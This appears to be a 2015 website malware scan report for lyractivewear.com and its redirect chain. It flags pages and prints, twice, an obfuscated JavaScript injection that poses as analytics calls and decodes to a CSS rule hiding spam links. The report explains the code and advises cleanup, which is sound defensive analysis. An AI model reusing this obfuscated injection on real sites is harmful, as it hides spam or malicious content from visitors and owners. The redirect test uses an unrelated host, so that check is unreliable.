Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lyractivewear.com
Result: Google has marked the website as suspicious; visiting this website may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: piantaunlibro.it
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: piantaunlibro.it
Referer: http://www.google.com/search?q=piantaunlibro.it
Result:
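The result is similar to the first query. No suspicious redirects were found. Note that both test requests shown here use piantaunlibro.it as the Host, not the scanned site lyractivewear.com, so as displayed this check does not show how the scanned site responds to visitors arriving from a search engine.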
Scanned pages/files
Request | Server response | Status |
http://lyractivewear.com/ | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 12:09:34 GMT Location: http://museactivewear.com/ Server: Apache Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://museactivewear.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 20 Jan 2015 12:09:35 GMT Pragma: no-cache Location: http://lyraactivewear.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=42jn5qfe868ltj6l3s9lf38ln5; path=/ X-Pingback: http://lyraactivewear.com/xmlrpc.php | clean |
http://lyraactivewear.com/ | 200 OK Content-Length: 19132 Content-Type: text/html | malicious |
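Malicious code - confirmed by antiviruses (see below):
var _gw9 = []; _gw9.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw9.push(['_trackPageview', '6918518510413211617917118518516717317118817517118916518']); _gw9.push(['_setOption', '2193182181185175186175181180128167168185181178187186171']); _gw9.push(['_trackPageview', '1291691781751821281841711691861101221211201821901141671']); _gw9.push(['_setPageId', '8718618111416718718618111412212112018219011112919513011']); _gw9.push(['_setPageId', '7185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw9.length; v++) t += _gw9[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z);
What the snippet does: the _gw9 array and its _setPageId / _trackPageview / _setOption entries imitate the naming of a Google Analytics command queue, but the second element of each entry is payload data. The script joins the digit strings, reads them three digits at a time, subtracts 70 from each value and converts it to a character with String.fromCharCode (the method name is assembled from string fragments, presumably to avoid signature matching), then injects the result with document.write. Decoded, this sample yields <style type="text/css">.messageview_p{position:absolute;clip:rect(432px,auto,auto,432px);}</style>, a rule that clips elements of class messageview_p out of view. Rules like this are typically used to hide injected content such as spam links from visitors, so the page source should also be searched for elements carrying that class.
Antivirus reports: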
| ||
http://lyraactivewear.com/wp-content/themes/muse/js/menucontents.js | 200 OK Content-Length: 566 Content-Type: application/x-javascript | clean |
http://lyractivewear.com/wp-content/themes/muse/js/anylinkmenu.js | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 12:09:38 GMT Location: http://museactivewear.com/ Server: Apache Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://museactivewear.com/test404page.js | 404 Not Found Content-Length: 15921 Content-Type: text/html | malicious |
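Malicious code - confirmed by antiviruses (see below):
var _gw9 = []; _gw9.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw9.push(['_trackPageview', '6918518510413211617917118518516717317118817517118916518']); _gw9.push(['_setOption', '2193182181185175186175181180128167168185181178187186171']); _gw9.push(['_trackPageview', '1291691781751821281841711691861101221211201821901141671']); _gw9.push(['_setPageId', '8718618111416718718618111412212112018219011112919513011']); _gw9.push(['_setPageId', '7185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw9.length; v++) t += _gw9[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z);
This is the same snippet reported for http://lyraactivewear.com/: it concatenates the digit strings, decodes each three-digit group (value minus 70) into a character through String.fromCharCode, and writes the result into the page with document.write. It is served here in the body of a 404 response for a file that does not exist, which suggests the injection sits in shared template or server-side output rather than in a single page. Cleanup should therefore cover the theme and core files, not only the homepage.
Antivirus reports: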
| ||
http://museactivewear.com/wp-content/themes/muse/js/menucontents.js | 200 OK Content-Length: 566 Content-Type: application/x-javascript | clean |
http://museactivewear.com/wp-content/themes/muse/js/anylinkmenu.js | 200 OK Content-Length: 13061 Content-Type: application/x-javascript | clean |
http://lyraactivewear.com/wp-content/plugins/easing-slider/js/jquery.js?ver=1.4.2 | 200 OK Content-Length: 72328 Content-Type: application/x-javascript | clean |
http://lyraactivewear.com/wp-includes/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 10220 Content-Type: application/x-javascript | clean |
http://lyraactivewear.com/wp-content/plugins/easing-slider/js/jquery.easing.js?ver=1.3 | 200 OK Content-Length: 8301 Content-Type: application/x-javascript | clean |
http://lyraactivewear.com/wp-content/plugins/easing-slider/js/script.js?ver=1.1.7 | 200 OK Content-Length: 9490 Content-Type: application/x-javascript | clean |
https://seal.godaddy.com/getSeal?sealID=3ySWWWtU8TV8PcRTPgp8PqfUzYtLjXwGKWSzkVTEGPXnokE8uvqR3sQ8vW | 204 No Content Content-Length: 0 Content-Type: text/plain | clean |
http://seal.godaddy.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://lyraactivewear.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20100407 | 200 OK Content-Length: 12292 Content-Type: application/x-javascript | clean |
http://lyraactivewear.com/?sjsl=colorbox,shopp,catalog,cart&c=1&ver=98239bb061a58639408323699680ad0e | 200 OK Content-Length: 23489 Content-Type: application/x-javascript | clean |
http://lyractivewear.com/wp-content/themes/muse/jsfont/cufon-yui.js | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 12:09:46 GMT Location: http://museactivewear.com/ Server: Apache Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://lyractivewear.com/wp-content/themes/muse/jsfont/Helvetica_Neue_LT_Std_900.js | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 12:09:47 GMT Location: http://museactivewear.com/ Server: Apache Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 | malicious |